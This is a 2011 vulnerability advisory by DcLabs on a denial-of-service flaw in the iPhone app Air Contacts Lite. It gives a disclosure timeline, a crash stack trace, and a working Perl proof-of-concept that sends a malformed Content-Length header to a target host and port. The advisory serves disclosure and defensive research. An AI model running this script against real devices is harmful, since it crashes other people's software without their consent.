|
[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):
[Software]
- Air Contacts Lite (By i-NOVATiON GmbH)
[Vendor Product Description]
- Sharing contacts can't be easier. Wireless access to your iPhone
contacts from your Mac or PC.
This is the Lite Version of Air Contacts. If you want more features
please upgrade to the normal version.
Source: �- http://itunes.apple.com/us/app/air-contacts-lite/id3084752
[Advisory Timeline]
- 01/26/2011 -> Advisory sent to vendor. (No response)
- 02/15/2011 -> Advisory sent again to vendor. (No response)
- 03/04/2011 -> Advisory published.
[Impact]
- Low
[Affected Version]
- Air Contacts Lite (Free Version)
- Paid version may also be vulnerable
- Prior versions may also be vulnerable
[Bug Description and Proof of Concept]
- While sending crafted HTTP packets the program does not treat
invalid requests entering in a NSException crashing the program.
<NSException>
Tue Jan 25 21:42:02 Program Name[23594] <Error>: *** Terminating app
due to uncaught exception 'NSInvalidArgumentException', reason: '***
-[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:]:
absurd length: 4294967295, maximum size: 2147483648 bytes'
*** Call stack at first throw:
(
� � �0 � CoreFoundation � � � � � � � � � � �0x3048e987
__exceptionPreprocess + 114
� � �1 � libobjc.A.dylib � � � � � � � � � � 0x33a0849d
objc_exception_throw + 24
� � �2 � CoreFoundation � � � � � � � � � � �0x3048e7c9 +[NSException
raise:format:arguments:] + 68
� � �3 � CoreFoundation � � � � � � � � � � �0x3048e803 +[NSException
raise:format:] + 34
� � �4 � Foundation � � � � � � � � � � � � �0x302d2a51
-[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:] +
108
� � �5 � Foundation � � � � � � � � � � � � �0x302df845
-[NSData(NSData) initWithBytes:length:] + 36
� � �6 � Foundation � � � � � � � � � � � � �0x302f224f
+[NSData(NSData) dataWithBytes:length:] + 34
� � �7 � Foundation � � � � � � � � � � � � �0x303216ab
_performFileHandleSource + 722
� � �8 � CoreFoundation
0x304447dd__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ +
12
� � �9 � CoreFoundation � � � � � � � � � � �0x304165b7
__CFRunLoopDoSources0 + 382
� � �10 �CoreFoundation � � � � � � � � � � �0x30415e5b __CFRunLoopRun + 230
� � �11 �CoreFoundation � � � � � � � � � � �0x30415c87
CFRunLoopRunSpecific + 230
� � �12 �CoreFoundation � � � � � � � � � � �0x30415b8f CFRunLoopRunInMode + 58
� � �13 �GraphicsServices � � � � � � � � � �0x31eec4ab GSEventRunModal + 114
� � �14 �GraphicsServices � � � � � � � � � �0x31eec557 GSEventRun + 62
� � �15 �UIKit � � � � � � � � � � � � � � � 0x313cf329
-[UIApplication _run] + 412
� � �16 �UIKit � � � � � � � � � � � � � � � 0x313cce93 UIApplicationMain + 670
� � �17 �Program Name � � � � � � � � � 0x00002f07 main + 42
� � �18 �Program Name � � � � � � � � � 0x00002ea4 start + 52
)
<END NSException>
[PoC]
# Air contacts Lite (Denial of Service)
#!/usr/bin/perl
use IO::Socket;
� � � if (@ARGV < 1) {
� � � � � � � usage();
� � � }
� � � $ip � � = $ARGV[0];
� � � $port � = $ARGV[1];
� � � print "[+] Sending request...\n";
� � � $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
� � � print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
� � � print $socket "Host: http://www.dclabs.com.br\r\n";
� � � print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
� � � sleep(2);
� � � close($socket);
� � � print "[+] Done!\n";
sub usage() {
� � � print "[-] DcLabs - Air Contacts Lite (DoS)\n\n";
� � � print "[-] Usage: <". $0 ."> <host> <port>\n";
� � � print "[-] Example: ". $0 ." 127.0.0.1 80\n";
� � � exit;
}
All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br
[Patch(s) / Workaround]
No patch(s) / workaround(s) were provided.
[Greetz]
DcLabs Security Research Group.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
|
推荐
评论(0条)
